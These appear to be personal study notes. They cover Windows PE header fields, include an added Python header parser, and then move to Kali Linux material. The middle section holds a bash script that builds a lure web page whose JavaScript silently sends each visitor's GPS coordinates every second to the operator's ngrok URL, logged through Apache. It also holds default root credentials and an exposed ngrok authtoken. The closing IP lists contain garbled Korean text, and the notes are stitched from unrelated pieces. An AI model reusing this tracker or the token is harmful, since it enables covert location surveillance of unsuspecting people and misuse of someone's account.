2022-06-21
*Windows PE
1. Windows Preinstallation Environment
2. Windows Portable Executable
1. Dos Header -> the signature code is MZ
2. Dos Stub -> meaningless code; it can be changed freely without causing any problem at execution.
3. NT Header
3-1) Signature -> the signature code is PE
3-2) File Header
WORD Machine; -> type of the current computer 014C
WORD NumberOfSections; -> number of sections 0003
DWORD TimeDateStamp; -> creation time 48025287
DWORD PointerToSymbolTable;
DWORD NumberOfSymbols;
WORD SizeOfOptionalHeader; -> size of the Optional Header 00E0
WORD Characteristics; -> features of this file 010F
3-3) Optional Header
WORD Magic; -> type of the executable file 010B
BYTE MajorLinkerVersion;
BYTE MinorLinkerVersion;
DWORD SizeOfCode;
DWORD SizeOfInitializedData;
DWORD SizeOfUninitializedData;
DWORD AddressOfEntryPoint; -> address that becomes the starting point when the file is executed and loaded into memory 0000739D
DWORD BaseOfCode; -> start of the code area
DWORD BaseOfData; -> start of the data area
DWORD ImageBase; -> 01000000
DWORD SectionAlignment; -> base multiple when in memory form
DWORD FileAlignment; -> base multiple when in file form
WORD MajorOperatingSystemVersion;
WORD MinorOperatingSystemVersion;
WORD MajorImageVersion;
WORD MinorImageVersion;
WORD MajorSubsystemVersion;
WORD MinorSubsystemVersion;
DWORD Win32VersionValue;
DWORD SizeOfImage; -> size when in memory form
DWORD SizeOfHeaders; -> size of the headers
DWORD CheckSum;
WORD Subsystem; -> screen type when executed (CUI, GUI, etc.)
WORD DllCharacteristics;
DWORD SizeOfStackReserve;
DWORD SizeOfStackCommit;
DWORD SizeOfHeapReserve;
DWORD SizeOfHeapCommit;
DWORD LoaderFlags;
DWORD NumberOfRvaAndSizes;
IMAGE_DATA_DIRECTORY DataDirectory
4. text(code) Header
5. data Header
6. rsrc Header
7. text(code) Section
8. data Section
9. rsrc Section
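Added example (not part of the original notes): a minimal PE32 header walker that follows the layout listed above, from the MZ signature through e_lfanew to the File Header and Optional Header, and rejects malformed input. The function names, the e_lfanew value 0x80, the linker version, BaseOfCode/BaseOfData and the alignment values in the sample are assumptions made for the demo; the other field values are the ones noted above.

```python
import struct
from datetime import datetime, timezone

FILE_HDR = struct.Struct("<HHIIIHH")  # IMAGE_FILE_HEADER (20 bytes)
OPT_HDR = struct.Struct("<HBB9I")     # Optional Header (PE32), Magic..FileAlignment


def parse_pe_headers(data: bytes) -> dict:
    """Walk Dos Header -> Signature -> File Header -> Optional Header."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)  # file offset of NT Header
    if e_lfanew + 4 + FILE_HDR.size > len(data):
        raise ValueError("e_lfanew points outside the file")
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    off = e_lfanew + 4
    machine, nsec, stamp, _, _, opt_size, chars = FILE_HDR.unpack_from(data, off)
    off += FILE_HDR.size
    if opt_size < OPT_HDR.size or off + opt_size > len(data):
        raise ValueError("truncated Optional Header")
    (magic, _, _, _, _, _, entry, _, _,
     base, sec_align, file_align) = OPT_HDR.unpack_from(data, off)
    if magic != 0x010B:  # 0x020B (PE32+) uses a different layout
        raise ValueError("not a PE32 Optional Header")
    return {
        "machine": machine,
        "sections": nsec,
        "built": datetime.fromtimestamp(stamp, timezone.utc).isoformat(),
        "characteristics": chars,
        "entry_rva": entry,
        "image_base": base,
        "entry_va": base + entry,  # where execution starts once mapped
        "section_alignment": sec_align,
        "file_alignment": file_align,
    }


def build_sample() -> bytes:
    """Constructed header-only image; noted values plus assumed filler."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x80)  # e_lfanew assumed
    stub = b"\0" * (0x80 - len(dos))  # Dos Stub bytes are never interpreted
    file_hdr = FILE_HDR.pack(0x014C, 3, 0x48025287, 0, 0, 0x00E0, 0x010F)
    opt = OPT_HDR.pack(0x010B, 7, 10, 0, 0, 0, 0x739D, 0x1000, 0x9000,
                       0x01000000, 0x1000, 0x200)  # alignments etc. assumed
    return dos + stub + b"PE\0\0" + file_hdr + opt.ljust(0x00E0, b"\0")
```

To inspect a real file, pass its bytes to `parse_pe_headers()`; `entry_va` is ImageBase plus AddressOfEntryPoint, which is the address a debugger stops at when the image loads at its preferred base.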
----------------------
sudo passwd root
kali
toor
toor
TrackURL
apt-get update
apt-get install gedit
service apache2 start == systemctl start httpd
gnome-terminal -e './ngrok http 80'
apt-get install gnome-terminal
apt-get install xterm
'./ngrok config add-authtoken 2AsCJD6nlqu4BI8CEoIZKAZaVJJ_884HESRjtSZscmWHS9EFG'
#!/bin/bash
#64_bit
#xterm -e ./ngrok http 80 & clear
#32_Bit
gnome-terminal -e './ngrok http 80'
'./ngrok config add-authtoken 2AsCJD6nlqu4BI8CEoIZKAZaVJJ_884HESRjtSZscmWHS9EFG'
echo " ______________________________________________________
7 77 _ 77 _ 77 77 7 77 7 77 _ 77 7
!__ __!| _|| _ || ___!| __!| | || _|| |
7 7 | _ \ | 7 || 7___| || | || _ \ | !___
| | | 7 || | || 7| 7 || ! || 7 || 7
!__! !__!__!!__!__!!_____!!__!__!!_____!!__!__!!_____!
"
sleep 5
read -p ' URL: ' varurl
echo "<!DOCTYPE html>
<html>
<head>
<title> ㄴㅇㄹㄴㅇㄹ </title>
<style type=\"text/css\">
body {
background-image: url(\"skull.jpg\");
background-size: 1000px 1600px;
background-repeat: no-repeat;
}
</style>
</head>
<body>
<script src=\"https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js\" type='text/javascript' ></script>
<script type='text/javascript'>
function httpGet(theUrl)
{
var xmlHttp = new XMLHttpRequest();
xmlHttp.open( \"GET\", theUrl, false ); // false for synchronous request
xmlHttp.send( null );
return xmlHttp.responseText;
}
function autoUpdate() {
navigator.geolocation.getCurrentPosition(function(position) {
coords = position.coords.latitude + \",\" + position.coords.longitude;
url = \""$varurl"/logme/\" + coords;
httpGet(url);
console.log('should be working');
setTimeout(autoUpdate, 1000);
})
};
\$(document).ready(function(){
autoUpdate();
});
</script>
</body>
</html>" > index.html
mv index.html /var/www/html/index.html
cp skull.jpg /var/www/html/skull.jpg
service apache2 start
echo " ______________________________________________________
7 77 _ 77 _ 77 77 7 77 7 77 _ 77 7
!__ __!| _|| _ || ___!| __!| | || _|| |
7 7 | _ \ | 7 || 7___| || | || _ \ | !___
| | | 7 || | || 7| 7 || ! || 7 || 7
!__! !__!__!!__!__!!_____!!__!__!!_____!!__!__!!_____!
" > /var/log/apache2/access.log
xterm -e tail -f /var/log/apache2/access.log &
clear
exit
In /usr/bin,
the google-chrome-stable file
--user-data-dir --test-type --no-sandbox
----Input method installation----
apt-get install fcitx-lib*
apt-get install fcitx-hangul
------------------------------------------------
κ°μꡬ[192.168.0.20] : 192.168.100.11(κΉμ ν)
192.168.250.11(μ€μ±μ)
20001 / 20002
------------------------------------------------
κΉμ ν[192.168.0.30] : 192.168.150.10(λ°μ ν)
192.168.100.10(κ°μꡬ)
30001 / 30002
------------------------------------------------
μ€μ±μ[192.168.0.40] : 192.168.200.10(λ°μ ν)
192.168.250.10(κ°μꡬ)
40001 / 40002
------------------------------------------------
λ°μ ν[192.168.0.200] : 192.168.150.11(κΉμ ν)
192.168.200.11(μ€μ±μ)
50001/ 50002
------------------------------------------------